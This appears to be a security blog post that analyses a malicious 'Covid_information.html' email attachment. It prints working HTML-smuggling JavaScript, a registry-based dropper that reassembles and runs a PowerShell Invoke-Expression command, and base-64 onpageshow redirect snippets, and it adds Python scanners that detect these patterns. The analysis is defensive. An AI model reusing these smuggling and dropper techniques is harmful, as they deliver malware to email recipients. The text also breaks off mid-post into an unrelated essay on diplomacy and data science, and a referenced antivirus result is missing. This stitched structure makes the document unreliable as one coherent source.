Everyone knows by now that you have to be very careful when surfing the internet. A little carelessness can cost you a lot and can lead to the loss of data and information, which are the most precious intangible assets today. Since 72% of attacks on organizations were reported to arrive by email, in this post I warn again about HTML files received by email as attachments. They look harmless, but looked at closely they hide a thousand pitfalls and dangers.

At the application level, any device interacts with cyberspace mainly through a mail client and a web browser.

As a demonstration of the above, I am going to examine in as much detail as possible an HTML file received as an attachment. It is named “Covid_information.html”.

Parallel use of many attack techniques: Spear Phishing, Malicious code in an HTML file and Web browser vulnerabilities

The JavaScript code inside “Covid_information.html” is the following one.

    <script>
    // placeholder: the real file carries a base-64 string of about 1622 KB here
    text = "a base-64 encoded long string of 1622 KB"

    function download(data, filename, type) {
        var file = new Blob([data], {type: type});
        if (window.navigator.msSaveOrOpenBlob)
            window.navigator.msSaveOrOpenBlob(file, filename);   // legacy IE/Edge save path
        else {
            var a = document.createElement("a"),
                url = URL.createObjectURL(file);
            a.href = url;
            a.download = filename;
            document.body.appendChild(a);
            a.click();                                           // triggers the download
            setTimeout(function() {
                document.body.removeChild(a);
                window.URL.revokeObjectURL(url);
            }, 0);
        }
    }
    bt = atob(text);                   // base-64 decode to a binary string
    bN = new Array(bt.length);
    for (var i = 0; i < bt.length; i++) {
        bN[i] = bt.charCodeAt(i);      // one byte value per character
    }
    bA = new Uint8Array(bN);
    download(bA, "Covid.iso", "application/x-cd-image")
    </script>

The first statement assigns a base-64 encoded 1622 KB string to the variable “text”. In practice this is the malicious payload, which we will look at later.

Then the function “download”:

  1. creates a hyperlink on the fly;
  2. links it to a file created from the content of the data variable;
  3. downloads this file.

The following statement decodes the base-64 content of “text” using the atob() function.

Then each character is converted to its numeric character code using the charCodeAt() function, and the codes are packed into a Uint8Array. At the end the file named "Covid.iso" is downloaded to local storage.
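As an added example (not part of the original post), here is how a mail gateway or an analyst could triage an attachment like this statically, without ever opening it in a browser: the scanner pulls the `<script>` bodies, counts the smuggling indicators named above (`atob`, `Blob`, `createObjectURL`, the `download` attribute, `msSaveOrOpenBlob`), decodes any large base-64 literal and identifies the carved payload by its magic bytes. The sample attachment and its stub ISO payload are constructed for the demonstration; the ISO 9660 marker `CD001` at offset 0x8001 is the real format check.

```python
import base64
import re

# Regexes for the smuggling pattern described above: a base-64 blob turned into a
# Blob object and handed to a synthetic <a download> click (or msSaveOrOpenBlob).
SMUGGLING_INDICATORS = {
    "atob": re.compile(r"\batob\s*\("),
    "blob": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "download_attr": re.compile(r"\.download\s*="),
    "ms_save": re.compile(r"msSaveOrOpenBlob"),
}
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
B64_LITERAL_RE = re.compile(r"""["']([A-Za-z0-9+/]{256,}={0,2})["']""")
# Magic bytes checked at the offset where each format keeps them; ISO 9660
# stores its "CD001" volume descriptor marker at byte 0x8001.
FILE_MAGIC = {
    "iso": (0x8001, b"CD001"),
    "zip": (0, b"PK\x03\x04"),
    "exe": (0, b"MZ"),
    "pdf": (0, b"%PDF"),
}


def identify(blob: bytes) -> str:
    """Return the file type of a carved payload by its magic bytes."""
    for name, (offset, magic) in FILE_MAGIC.items():
        if blob[offset:offset + len(magic)] == magic:
            return name
    return "unknown"


def scan_attachment(html: str) -> dict:
    """Scan an HTML attachment's <script> blocks for download smuggling.

    Returns the indicator names matched, every large base-64 literal decoded
    and typed, and the filename passed to the download helper, if any.
    """
    scripts = "\n".join(SCRIPT_RE.findall(html))
    hits = [name for name, rx in SMUGGLING_INDICATORS.items() if rx.search(scripts)]
    payloads = []
    for m in B64_LITERAL_RE.finditer(scripts):
        try:
            blob = base64.b64decode(m.group(1), validate=True)
        except ValueError:        # not valid base-64, skip it
            continue
        payloads.append({"size": len(blob), "type": identify(blob)})
    fname = re.search(r"""download\s*\([^,]*,\s*["']([^"']+)["']""", scripts)
    return {
        "indicators": hits,
        "payloads": payloads,
        "filename": fname.group(1) if fname else None,
        # three or more indicators plus a carved payload is the smuggling pattern
        "verdict": "smuggling" if len(hits) >= 3 and payloads else "clean",
    }


def _constructed_iso() -> bytes:
    """Constructed stand-in for Covid.iso: only the ISO 9660 descriptor marker."""
    body = bytearray(0x8000 + 16)
    body[0x8000] = 1                  # primary volume descriptor type
    body[0x8001:0x8006] = b"CD001"
    return bytes(body)


# Constructed sample attachment mirroring the script above (payload is the stub ISO).
SAMPLE_HTML = """<html><body><script>
  text="PAYLOAD"
  function download(data, filename, type) {
    var file = new Blob([data], {type: type});
    if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(file, filename);
    else { var a = document.createElement("a"), url = URL.createObjectURL(file);
           a.href = url; a.download = filename; document.body.appendChild(a); a.click(); }
  }
  bt = atob(text); bN = new Array(bt.length);
  for (var i = 0; i < bt.length; i++) { bN[i] = bt.charCodeAt(i); }
  download(new Uint8Array(bN), "Covid.iso", "application/x-cd-image")
</script></body></html>""".replace("PAYLOAD", base64.b64encode(_constructed_iso()).decode())

if __name__ == "__main__":
    print(scan_attachment(SAMPLE_HTML))
```

The verdict threshold is deliberately conservative: a single `atob()` call is common in legitimate pages, while the combination of decoding, `Blob` construction and a synthetic download click with a disk-image or archive payload is the signature of this delivery technique.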

A look at the Covid.iso file.

The file Covid.iso contains an HTML file with the following JavaScript code:

    <script language="javascript">
    var a = new ActiveXObject('Wscript.Shell');
    function start() {
        res = document.getElementById("p1").innerHTML;
        a.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\JavaSoft\\Ver", res, "REG_SZ");
        res = document.getElementById("p2").innerHTML;
        a.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\JavaSoft\\Ver2", res, "REG_SZ");
        res = document.getElementById("c1").innerHTML;
        res += document.getElementById("c2").innerHTML;
        res += document.getElementById("c3").innerHTML;
        res += document.getElementById("c4").innerHTML;

        res += document.getElementById("c5").innerHTML;
        a.Run(res, 0);
        
    }
    </script>

In this code what is crucial is the content of the DOM elements carried inside the HTML file, that is: p1, p2, c1, c2, c3, c4 and c5.

These elements serve as a kind of obfuscation: their contents are assembled together in order to execute arbitrary code on the host machine.

P1= (“a base-64 encoded long string”) containing a binary.

P2= (“a base-64 encoded long string”) containing code:

c1=powers

c2=hell -C Invo

c3=ke-Expression (g

c4=p HKCU:\\SO

c5=FTWARE\\JavaSoft).Ver

The final command is:

powershell -C Invoke-Expression (gp HKCU:\\SOFTWARE\\JavaSoft).Ver

The Invoke-Expression cmdlet runs a command or expression on the local computer; here the expression it runs is the code previously written to the registry value “Ver” under HKCU:\SOFTWARE\JavaSoft.

Even if the above analysis is not complete, it demonstrates a high level of sophistication, the work of people with a high level of know-how.
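As an added example (not code from the original post), the fragment reassembly described above can be replayed statically: collect the text of every element that has an id, walk the `res = ...` / `res += ...` statements in source order, and record what each assembled value is handed to (a `RegWrite` with its key, or `Run`). The dropper HTML below is constructed to mirror the structure the post describes, with placeholder text in p1 and p2 in place of the real base-64 blobs.

```python
import re
from html.parser import HTMLParser

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
# One regex for the two statement shapes that matter: building "res" from element
# contents, and handing "res" to a Wscript.Shell sink (RegWrite with its key, or Run).
STMT_RE = re.compile(
    r"""res\s*(?P<op>\+?=)\s*document\.getElementById\(\s*["'](?P<id>\w+)["']\s*\)\.innerHTML"""
    r"""|\b(?P<sink>RegWrite|Run)\s*\(\s*(?:"(?P<key>[^"]*)"\s*,\s*)?res\b"""
)


class IdTextCollector(HTMLParser):
    """Collect the text content of every element that carries an id attribute.

    Plain text is enough here: the fragments are text nodes, so this equals the
    innerHTML the script reads (nested markup would need a fuller DOM).
    """

    def __init__(self):
        super().__init__()
        self.texts = {}
        self.current = None

    def handle_starttag(self, tag, attrs):
        self.current = dict(attrs).get("id")

    def handle_endtag(self, tag):
        self.current = None

    def handle_data(self, data):
        if self.current:
            self.texts[self.current] = self.texts.get(self.current, "") + data


def reconstruct_actions(html: str) -> list:
    """Replay the assignments in source order; return (sink, registry key, value) triples."""
    collector = IdTextCollector()
    collector.feed(html)
    scripts = "\n".join(SCRIPT_RE.findall(html))
    actions, res = [], ""
    for m in STMT_RE.finditer(scripts):
        if m.group("op") == "=":
            res = collector.texts.get(m.group("id"), "")
        elif m.group("op") == "+=":
            res += collector.texts.get(m.group("id"), "")
        else:
            key = m.group("key")
            # the JS source doubles backslashes inside string literals; undo that
            actions.append((m.group("sink"), key.replace("\\\\", "\\") if key else None, res))
    return actions


def uses_wscript_shell(html: str) -> bool:
    """ActiveXObject('Wscript.Shell') is the capability that turns this HTML into a dropper."""
    return bool(re.search(r"""ActiveXObject\(\s*['"]Wscript\.Shell['"]\s*\)""", html, re.I))


# Constructed sample modelled on the dropper structure described above.
SAMPLE_DROPPER = r"""<html><body>
<p id="p1">constructed-base64-binary-placeholder</p>
<p id="p2">constructed-base64-code-placeholder</p>
<span id="c1">powers</span><span id="c2">hell -C Invo</span>
<span id="c3">ke-Expression (g</span><span id="c4">p HKCU:\SO</span>
<span id="c5">FTWARE\JavaSoft).Ver</span>
<script language="javascript">
var a = new ActiveXObject('Wscript.Shell');
function start() {
    res = document.getElementById("p1").innerHTML;
    a.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\JavaSoft\\Ver", res, "REG_SZ");
    res = document.getElementById("p2").innerHTML;
    a.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\JavaSoft\\Ver2", res, "REG_SZ");
    res = document.getElementById("c1").innerHTML;
    res += document.getElementById("c2").innerHTML;
    res += document.getElementById("c3").innerHTML;
    res += document.getElementById("c4").innerHTML;
    res += document.getElementById("c5").innerHTML;
    a.Run(res, 0);
}
</script></body></html>"""

if __name__ == "__main__":
    for action in reconstruct_actions(SAMPLE_DROPPER):
        print(action)
```

The output lists the two registry writes and the final `Run` with the full reassembled command line, which is what an analyst needs in order to confirm the behaviour without executing the file. For detection, the `Wscript.Shell` check alone is a strong signal in an HTML attachment, since a normal web page has no reason to instantiate it.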

So beware of attachments in HTML format!

References

Email attachments are one of the main vectors of malicious code. According to analysis by the Helsinki-based security provider F-Secure, 85% of all malicious emails have a .DOC, .XLS, .PDF, .ZIP, or .7Z file attached.

But now, in addition to these, we have to consider another type of dangerous attachment: .HTML.

When we receive an email with an attachment of .HTML type, we have to be very careful and not open it. The .HTML file could contain, for example, this dangerous JavaScript code:

<body onpageshow="document.location.replace(window.atob('a base-64 encoded string'));">

or

<frameset onpageshow="document.location.replace(window.atob('a base-64 encoded string'));"> 

The onpageshow event is used because it fires every time the page is shown, while the onload event fires only when the page first loads and does not fire when the page is loaded from the cache.

document.location.replace(newURL) replaces the current document with a new one.

The atob() method decodes a base-64 encoded string encoded by the btoa() method. The base-64 code string obfuscates the URL it represents.

In the second code snippet we can notice the use of <frameset> tag which is deprecated, no longer recommended and not supported in HTML5. Anyway some browsers might still support it for compatibility purposes.

The problem is that the JavaScript code inside the HTML page can load any URL, and only by decoding the “base-64 encoded string” can you know which web page. The decoding of the base-64 string is done dynamically by the atob function when the web page is shown in the web browser. So, if you open the file, it is already too late in the case of a malicious web page.
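Because the decoding only happens at page-show time, the safe way to learn the target is to decode it yourself before the browser does. As an added example (not code from the original post), the following static check parses the attachment, picks out every `on*` event-handler attribute that rewrites `document.location`, decodes the `atob()` argument and reports the scheme and host of the hidden URL. The two sample files reproduce the `<body>` and `<frameset>` snippets above with a constructed target URL on the reserved `example.invalid` domain.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# An event-handler attribute that rewrites the location counts as a redirect.
REDIRECT_RE = re.compile(
    r"(?:document|window)\.location(?:\.replace\s*\(|\.assign\s*\(|\.href\s*=|\s*=)"
)
ATOB_RE = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")


class HandlerCollector(HTMLParser):
    """Record every on* attribute, with its tag, in document order."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower().startswith("on") and value:
                self.handlers.append((tag, name.lower(), value))


def extract_redirects(html: str) -> list:
    """Decode base-64 redirect targets hidden in event handlers without loading the page."""
    parser = HandlerCollector()
    parser.feed(html)
    findings = []
    for tag, event, code in parser.handlers:
        if not REDIRECT_RE.search(code):
            continue
        for encoded in ATOB_RE.findall(code):
            try:
                url = base64.b64decode(encoded, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue                      # not a decodable string literal
            parsed = urlparse(url)
            findings.append({"tag": tag, "event": event, "url": url,
                             "scheme": parsed.scheme, "host": parsed.hostname})
    return findings


# Constructed samples: the redirect target is a placeholder on a reserved domain.
_TARGET = base64.b64encode(b"https://example.invalid/account/verify").decode()
SAMPLE_BODY = '''<html><body onpageshow="document.location.replace(window.atob('%s'));"></body></html>''' % _TARGET
SAMPLE_FRAMESET = '''<html><frameset onpageshow="document.location.replace(window.atob('%s'));"></frameset></html>''' % _TARGET

if __name__ == "__main__":
    for finding in extract_redirects(SAMPLE_BODY) + extract_redirects(SAMPLE_FRAMESET):
        print(finding)
```

The decoded host is the value worth feeding into blocklists or reputation checks; the event name and tag are useful for writing a gateway rule that flags any attachment whose `onpageshow` or `onload` handler immediately replaces the location.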

With malicious code in a web page we can have:

  • Malicious Ads: they are advertisements on the Web that infect the user's machine with malware in order to make the compromised machine a member of a Botnet.
  • A Malware Distribution Network (MDN): it is a collection of landing pages, malware repository servers, and standard redirection pages. The goal of an MDN is to redirect the victim from a landing page to a malware repository server.
  • Drive-by Downloads: the automatic download of software to a user's device, without the user's knowledge or consent.

Here is how an antivirus reacted when it scanned this type of HTML attachment:

Marco Alberti in his book “Open Diplomacy” [02] reviews the practice of diplomacy in the light of his nine years of experience at the ENEL Company as head of international institutional affairs.

New technologies have transformed and changed international relations. In this constantly evolving world diplomacy must operate and develop strategies and visions. It must use all possible new means: innovation, digitalization, data science (data-driven diplomacy) to be competitive on the international scene. Diplomats must act as System Orchestrators to face the rapid changes of the world and must take advantage of the human factor by enhancing their competence to win the challenge.

As the diplomat represents the state, which in turn represents the citizens, his goal is to interpret the complexity in order to protect, defend and promote his state and citizen interests and create value while promoting cooperative relations with other states.

ICT COMPETENCE OR DIGITAL COMPETENCE

In general, by competence we mean the potential to put effective behaviour into practice. When we talk about the competence of a person, we must consider on the one hand their qualities, which help them to be successful at work and in life, and on the other hand their competence as knowledge acquired during their studies and their experience.

It is clear that personal qualities and knowledge together give a person the ability to produce superior performance at work as well as in other fields.

ICT COMPETENCE AND DATA DIPLOMACY

Data has a source, can have an owner, and can be public or private, shared or not shared. Its use can lead to benefits or disadvantages. Data can have an impact at the individual, institutional, state, or global level.

Data are of many types: structured, unstructured, quantitative, and categorical. Huge quantities of data (Big Data) are massive and contain greater Variety, arriving in increasing Volumes and with higher Velocity (the 3Vs).

Data Science is needed to manage and work with data. Data Science is a multidisciplinary field that understands and extracts insights from the ever-increasing amounts of data. It puts together concepts from computer science, statistics/machine learning and data analysis. It uses two paradigms of data research:

  • Hypothesis-Driven: given a problem, what kind of data do we need to help solve it?
  • Data-Driven: given some data, what interesting problems can be solved with it?

Data Science tries to understand what can be learned from data and what actions we can take once we find whatever it is we are looking for.

In this framework, where data can affect diplomatic processes or trigger policy actions, we have to consider the risks associated with using it, especially in data-driven interactions. Digital data and algorithms/software can be modified, manipulated and tampered with, and therefore they can easily be “hacked” by actors with malicious intent. Given the global nature of cyber threats, appropriate caution and a cybersecurity infrastructure to filter, protect and use digital data are needed.

The origin of data can be an international institution like the OCSE, the ONU and so on, open sources, whistle-blowing data disclosures (Edward Snowden’s public revelation) or data scraped and shared by hackers.

So data must be given the right weight by trying to distinguish “trusted data” from “fake data”. This is very important when a data-driven decision schema is used by important players like diplomats.

REFERENCES

[01] "Diplomacy X.0": coined by Ambassador Giampiero Massolo;

[02] Marco Alberti, Open Diplomacy. Diplomazia economica aumentata al tempo del Covid-1 https://www.ibs.it/open-diplomacy-diplomazia-economica-aumentata-libro-marco-alberti/e/9788849865134;

[03] Andy Boyd, Jane Gatewood, Stuart Thorson and Timothy D.V. Dye, Data Diplomacy https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6785044/#FN5;

[04] Should Data Science be considered as its own discipline? https://thedatascientist.com/data-science-considered-own-discipline/